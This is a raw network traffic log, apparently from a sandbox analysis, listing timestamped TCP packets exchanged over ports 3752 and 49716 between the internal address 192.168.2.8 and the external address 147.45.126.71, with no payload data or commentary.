Oct 8, 2024 20:52:31.828221083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828370094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828385115 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828402042 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.828412056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.833741903 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.833765030 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.833950043 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.834199905 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.834872961 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.841779947 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.841805935 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.841852903 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.841989040 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.910556078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910569906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910590887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910605907 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910614014 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910623074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910631895 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910640001 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910695076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910710096 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910727978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910826921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910847902 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910861969 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910876036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.910888910 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911035061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911050081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911062956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911092997 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911106110 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911118984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911133051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911147118 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911464930 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911509037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911540985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911629915 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911643982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911669970 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911684990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911699057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911712885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911725998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911739111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911757946 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911772013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911786079 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911807060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911820889 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911834955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.911848068 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912009001 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912055016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912065983 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912095070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912108898 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912187099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912280083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912296057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912311077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912323952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912337065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912359953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912375927 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912389994 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912408113 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912421942 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912436008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912450075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912596941 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912611961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912625074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912719965 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912734985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912749052 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912761927 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912872076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912885904 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912908077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912920952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912935019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912947893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912961960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.912976027 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913111925 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913162947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913176060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913191080 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913300991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913320065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913333893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913352013 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913367033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913381100 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913410902 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913424969 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913440943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913453102 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913472891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913487911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913501024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913513899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913527966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913541079 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913554907 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913861036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913875103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913888931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913947105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913961887 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913975954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.913989067 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914443970 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914458990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914479971 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914493084 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914519072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914532900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914547920 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914560080 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914649963 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914665937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914681911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914731979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914746046 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914834976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.914849997 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.920479059 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920523882 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920842886 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920842886 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920905113 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920905113 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920905113 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920933962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920979023 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920979023 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.920979023 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.921077967 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.921122074 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.921122074 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:31.998430967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998445988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998464108 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998486996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998501062 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998514891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998528957 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998544931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998558044 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998572111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998585939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998718023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998730898 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998744011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998756886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998769999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998783112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998795986 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998809099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998828888 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998842955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998855114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998867989 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998882055 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998893976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998907089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998919010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998939991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998954058 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998967886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998980999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.998995066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999007940 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999021053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999034882 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999048948 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999062061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999074936 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999087095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999099970 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999113083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999125957 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999192953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999208927 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999221087 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999233961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999248028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999262094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999283075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999296904 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999310017 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999322891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999337912 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999351978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999566078 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999579906 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999737978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999752045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999764919 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999794006 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999813080 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999825001 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999838114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999860048 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999872923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999886036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999897957 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999911070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:31.999926090 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000113010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000128031 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000140905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000230074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000241995 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000255108 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000267982 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000288010 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000303984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000318050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000332117 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000345945 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000370979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000617981 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000626087 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.000638008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000653028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000664949 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000679016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000693083 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000731945 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000746012 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000758886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000771999 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000785112 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000823021 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000835896 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000849962 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000863075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.000874996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001189947 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.001189947 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.001302004 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.001487970 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001502991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001503944 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.001517057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001539946 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.001553059 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001564980 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001579046 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001593113 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001605988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001626015 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001637936 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001667976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001681089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001696110 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.001710892 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.002135038 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.002403975 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.002474070 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.002537966 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.002567053 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.002635956 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.103605986 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.103624105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.103637934 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.103652954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.103667974 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.103682041 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.103698015 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.103769064 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.104219913 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104247093 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104259968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104275942 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104338884 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.104338884 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.104438066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104453087 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104465961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104482889 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104496002 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104510069 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104522943 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104536057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104549885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104562998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104578018 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104598045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104600906 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.104614019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104626894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104645967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104659081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104672909 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104686975 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104701042 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104713917 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.104715109 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104729891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104748011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104762077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104774952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104789019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104801893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104818106 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104829073 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.104902983 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.104964018 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.104999065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105041027 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.105223894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105240107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105252981 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105285883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105298996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105313063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105326891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105442047 CEST	3752	49716	147.45.126.71	192.168.2.8
